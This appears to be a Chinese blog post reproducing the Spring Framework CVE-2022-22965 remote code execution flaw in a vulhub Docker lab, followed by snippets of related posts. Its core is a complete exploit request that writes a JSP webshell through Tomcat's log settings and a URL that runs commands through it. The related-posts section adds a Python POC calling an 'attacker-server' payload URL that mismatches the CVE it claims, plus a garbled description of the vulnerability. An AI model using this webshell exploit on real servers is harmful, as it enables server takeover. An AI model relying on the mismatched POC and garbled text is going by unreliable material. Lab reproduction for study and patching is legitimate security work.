【漏洞复现】CVE-2022-22965 Spring Framework远程代码执行漏洞

最新推荐文章于 2025-06-11 03:46:11 发布
原创 最新推荐文章于 2025-06-11 03:46:11 发布 · 307 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#spring #java #后端

文章描述了一种利用Docker容器中的Tomcat服务,通过发送特定的HTTPGET请求,修改Tomcat日志路径和后缀,进而植入JSPWebshell的方法。使用BurpSuite进行抓包和数据包修改是关键步骤,一旦Webshell创建成功,可以执行任意命令,如示例中的`ls`命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

开启环境

sudo docker-compose up -d 

查看端口号

sudo docker ps 

服务启动后,访问http://your-ip:8080/?name=Steve&age=25即可看到一个演示页面。

 打开BurpSuite进行抓包,并发送如下数据包,即可修改目标的Tomcat日志路径与后缀,利用这个方法写入一个JSP文件:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

suffix: %>//

c1: Runtime

c2: <%

DNT: 1

 然后,访问刚写入的JSP Webshell,执行任意命令:

http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=ls

CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3931
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-22965 漏洞复现
Ethan_cfq的博客
04-13 506
执行格式 :python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro。此时已将tomcat的日志存储位置已修改为:tomcatwar.jsp,此文件是小马文件,可执行远程命令。拉取cve-2022-22965环境(vulhub拉去环境并打开漏洞环境)在靶场环境搭建可访问的情况下,运行python文件,可直接进行远程命令执行。此时我们可以正常访问页面,说明我们的靶场环境可以使用。访问靶场环境是否可正常访问。此时,手工漏洞复现结束。
CVE-2022-22965漏洞复现
最新发布
q18217810766的博客
06-11 485
攻击者通过精心构造的 HTTP 请求参数,利用 Spring 自动绑定对象属性的特性,修改 Tomcat 日志配置相关对象的敏感属性(如日志路径、文件名、内容格式等),最终实现远程代码执行。攻击者通过参数构造多级属性路径(如class.module.classLoader.resources.context.parent.pipeline.first.pattern),逐层访问到 Tomcat 的AccessLogValve对象,修改其日志配置属性(如pattern、directory等)。
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 4127
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
spring framework漏洞复现
m0_56135391的博客
04-12 1879
1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证,此处使用kali进行攻击,命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc(python文件) #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%
Spring Framework 远程代码执行漏洞复现CVE-2022-22965
Start C的博客
04-01 4983
1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Blue的博客
06-22 2215
Spring Framework存在远程代码执行漏洞,在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞
CVE-2022-22965Spring远程代码执行漏洞复现
精品博客,你值得一看~
03-15 4258
由于Spring框架历史漏洞修复代码存在缺陷,在 JDK 9 及以上版本环境下,远程攻击者可借助Tomcat中间件构造数据包修改日志文件,从而可在任意路径下写入Webshell等恶意文件,最终可导致执行任意代码控制服务器等危害。Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。4.使用 spring-webmvc 或 spring-webflux 的依赖。
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 6118
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞复现
Wiofgb的博客
08-12 2086
记录一次CVE-2022-22965 Spring Framework远程代码执行漏洞复现
Spring Framework远程代码执行漏洞(CVE-2022-22965)
热门推荐
chaojixiaojingang
04-06 1万+
1.漏洞描述 由于Spring处理流程存在缺陷,在JDK9及以上版本的Spring框架环境中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,触发pipeline机制,从而在任意路径下写入文件。远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2.影响版本 JDK >= 9 & 5.3.X < Spring Framework < 5.3.18 JDK >= 9 & 5.2.X ...
[2022.3.30安全漏洞]Spring Framework远程代码执行漏洞
DynmicResource的博客
04-01 3134
一起养成写作习惯!这是我参与「掘金日新计划 · 4 月更文挑战」的第1天,点击查看活动详情。 2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。 目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞...
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 1056
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-11 2160
Spring frameworkSpring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。受影响范围:JDK >= 9不受影响的版本JDK < 9。
Spring框架存在远程命令执行CVE-2022-22965漏洞
m0_74080781的博客
02-21 973
CE2022965是一个较老但当时非常流行的动作工具,功能丰富,基于框架。 2.该工具可以做很多事情,包括配合log进行高版本GDP过滤。 3.ce2022965的版本号有其特殊规则,副版本号不能超过9.999.0.66,主版本号必须大于1.8。漏洞利用条件1. 检测是否使用Spring框架,若未使用,则不存在该漏洞。2. 检查项目是否使⽤Spring参数绑定,若未使用,则不存在该漏洞。3. 检查中间件使用的JDK版本,若版本号小于9,则不存在该漏洞。利用jdk9+的新特性,也就是module机制...
Spring框架(Framework)存在远程命令执行漏洞
qq_20025777的博客
08-31 718
Spring框架存在远程命令执行漏洞
Spring Framework 远程命令执行漏洞CVE-2022-22965
qq_32445755的博客
03-31 518
简介 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 Spring 0day漏洞 影响范围 JDK9 <= Spring Cloud Function JDK9及其以上版本; 使⽤了Spring-bean
【安全通报】Spring Framework 远程命令执行漏洞CVE-2022-22965
Hanko的专栏
04-02 3974
原文: https://nosec.org/home/detail/4983.html 近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框架以及衍生的框架中。 漏洞描述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执
CVE-2022-22947 漏洞复现
04-01
### 关于 CVE-2022-22947 漏洞复现 CVE-2022-22947 是一个存在于 Spring Cloud Gateway 中的远程代码执行漏洞,攻击者可以通过构造恶意请求触发该漏洞并实现远程命令执行。以下是针对此漏洞复现过程及相关技术细节。 #### 1. 漏洞概述 Spring Cloud Gateway 的路由功能存在缺陷,在处理某些特定参数时未能正确验证输入数据的安全性,从而允许攻击者通过精心设计的 HTTP 请求注入恶意代码[^4]。 #### 2. 环境准备 为了成功复现 CVE-2022-22947 漏洞,需搭建如下测试环境: - **操作系统**: Linux 或 Windows (推荐 Ubuntu) - **Java 版本**: JDK 8 及以上版本 - **依赖组件**: - Spring Boot >= 2.6.x, < 2.6.7 - Spring Cloud Gateway >= 3.1.x, < 3.1.2 安装完成后启动服务端程序,并确认其正常运行状态。 #### 3. 利用工具与脚本 可采用以下方式完成漏洞利用操作: ##### 方法一:手动构建 POC 下面展示了一个简单的 Python 脚本来模拟攻击行为: ```python import requests url = "http://target-ip:port/gateway" payload = { 'class.module.classLoader.resources.context': '', 'class.module.classLoader.URLs': '[new java.net.URL("http://attacker-server/payload")]', } response = requests.post(url, data=payload) if response.status_code == 200: print("[+] Payload sent successfully!") else: print(f"[-] Failed to send payload! Status code {response.status_code}") ``` 上述代码片段尝试向目标服务器发送包含恶意 URL 地址的数据包以加载外部资源文件。 ##### 方法二:自动化扫描器 部分开源安全检测平台已经集成了对该类问题的支持模块,例如 Metasploit Framework 和 Nmap Script Engine 。用户只需按照官方文档指引配置相应选项即可快速定位受影响资产实例。 #### 4. 结果验证 当成功触发漏洞后,通常会在日志记录或者实际业务逻辑层面观察到异常现象;与此同时也可以借助网络抓包手段进一步核实交互详情。 #### 5. 安全加固建议 为了避免遭受此类威胁影响,请及时采取措施升级至最新稳定版软件发行号,并遵循最佳实践指导原则加强整体防护能力水平: - 更新至不受影响的新版本; - 使用 Web 应用防火墙(WAF)作为额外屏障层过滤潜在危险流量模式; - 对所有传入参数实施严格的白名单校验机制防止非法字符混入其中。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值